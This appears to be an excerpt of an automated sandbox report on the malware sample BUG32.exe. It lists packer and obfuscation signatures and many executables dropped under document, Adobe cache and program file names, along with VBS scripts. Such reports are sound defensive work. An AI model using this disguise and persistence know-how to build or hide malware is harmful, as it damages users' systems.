    Source: Binary string: c:\users\guest\documents\visual studio 2015\Projects\msaccessdenied\msaccessdenied\obj\Debug\msaccessdenied.pdb source: BUG32.exe, 00000000.00000003.2026291126.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, BUG32.exe, 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmp, wscript.exe, 00000005.00000002.3899135257.00000276014AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745897034.000002760147E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3703614504.00000276014AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745943282.0000027601469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3709577680.00000276014AB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: c:\users\guest\documents\visual studio 2015\Projects\msaccessdenied\msaccessdenied\obj\Debug\msaccessdenied.pdb,hFh 8h_CorExeMainmscoree.dll source: BUG32.exe, 00000000.00000003.2026291126.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, BUG32.exe, 00000000.00000002.2052125385.0000000000411000.00000002.00000001.01000000.00000003.sdmp, wscript.exe, 00000005.00000002.3899135257.00000276014AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745897034.000002760147E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3703614504.00000276014AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2745943282.0000027601469000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.3709577680.00000276014AB000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeUnpacked PE file: 1.2.aJEWGt.exe.ae0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00409881 LoadLibraryA,GetProcAddress,GetVersionExA,0_2_00409881
    Source: initial sampleStatic PE information: section where entry point is pointing to: )Gu
    Source: BUG32.exeStatic PE information: section name: .code
    Source: BUG32.exeStatic PE information: section name: )Gu
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.1.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00711E7B push ebp; ret 0_2_00711E7E
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00711E7A push ebp; ret 0_2_00711E7E
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE1638 push dword ptr [00AE3084h]; ret 1_2_00AE170E
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE6076 push 00AE14E1h; ret 1_2_00AE6425
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE600A push ebp; ret 1_2_00AE600D
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE2D9B push ecx; ret 1_2_00AE2DAB
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0909F8DA push eax; iretd 6_2_0909F995
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0909F8DC push eax; iretd 6_2_0909F8E5
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0909CF50 pushad ; iretd 6_2_0909CF51
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0909CF53 pushad ; iretd 6_2_0909CF51
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0909F964 push eax; iretd 6_2_0909F995
    Source: BUG32.exeStatic PE information: section name: )Gu entropy: 6.934623219704007
    Source: aJEWGt.exe.0.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: ad.exe.0.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: jsc.exe.0.drStatic PE information: section name: .text entropy: 7.778664223223171
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934635510346392
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934183268074004
    Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934795429281525
    Source: 6C7D10EA.exe.1.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: ad.exe.3.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: jsc.exe.3.drStatic PE information: section name: .text entropy: 7.778664223223171
    Source: 1206337459.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: DC_Reader_Disc_LHP_Retention.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: Network Persistent State.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: CURRENT.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: 0786087c3c360803_0.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: LOCK.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351
    Source: data_1.exe.5.drStatic PE information: section name: .text entropy: 7.22180302157351

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\TQDFJHPUIU.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\CZQKSDDMWR.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EFOYFBOLXA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EFOYFBOLXA.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\NYMMPCEIMA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\DUUDTUBZFW.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\PALRGUCVEH.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GIGIYTFFYT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GRXZDKKVDB.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EWZCVGNOWT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Temp\AdobeARM.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Temp\AdobeARM.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\NetworkDataMigrated.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Temp\AdobeARM.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Temp\AdobeARM.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENT.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile written: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\BUG32\admin.vbsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\BUG32\emptyone.vbsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\BUG32\jaq.vbsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\BUG32\runner.vbsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\TQDFJHPUIU.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1206337459Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD567.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\5713452101.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\wctB04C.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\user.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0982390758.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0409654664.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\BUG32\ad.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6577738837.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9422479677.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1927994670.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7245361316.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EFOYFBOLXA.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\_curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64Jump to dropped file
